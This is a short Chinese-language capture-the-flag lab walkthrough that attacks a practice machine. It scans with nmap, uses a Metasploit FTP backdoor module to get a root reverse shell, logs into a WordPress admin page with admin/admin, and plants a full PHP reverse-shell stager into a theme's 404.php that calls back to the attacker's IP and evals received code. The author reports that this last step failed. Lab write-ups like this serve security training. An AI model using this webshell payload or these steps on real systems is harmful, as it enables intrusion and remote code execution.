CTF靶机实战-FTP服务后门

靶场：
和彩云 提取码:hEKo

攻击机：192.168.106.131

1.进行目标主机探测 nmap 192.168.106.1/24

2.nmap -sV -v -T4 192.168.106.129 扫描目标服务版本详细信息

2.使用searchsploit [服务版本] 查看有没有可利用的漏洞

发现了两个利用信息，接下来为了省事（太菜了）使用metssploit进行利用

这里使用4号建立后门模块

1. use 4
2. show payloads 查看可用payload
3. set payload 3 cmd/unix/reverse 设置反弹shellpayload
4. show options 查看需要设置的信息，并填写
5. run 执行远程溢出命令

成功拿到目标shell，而且还是root权限的😁

使用
python -c "import pty;pty.spawn('/bin/bash')"
优化shell

3.接下来进入root目录下拿到flag就ok啦

a.回想一下，进行目标端口扫描时发现目标还开启了80端口，那么😁

b.使用dirb http://192.168.106.129 对目标进行目录扫描
发现管理登入界面

c.进行简单尝试后发现 admin admin 居然进了😁

c.在目标404界面插入反弹shell代码

/*<?php /**/ error_reporting(0); $ip = '192.168.106.131'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

注意点击上传

d.在msfconsole中启动监听

然后通过固定路径http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php访问webshell
不知道为什么不能成功😌（以后再来把）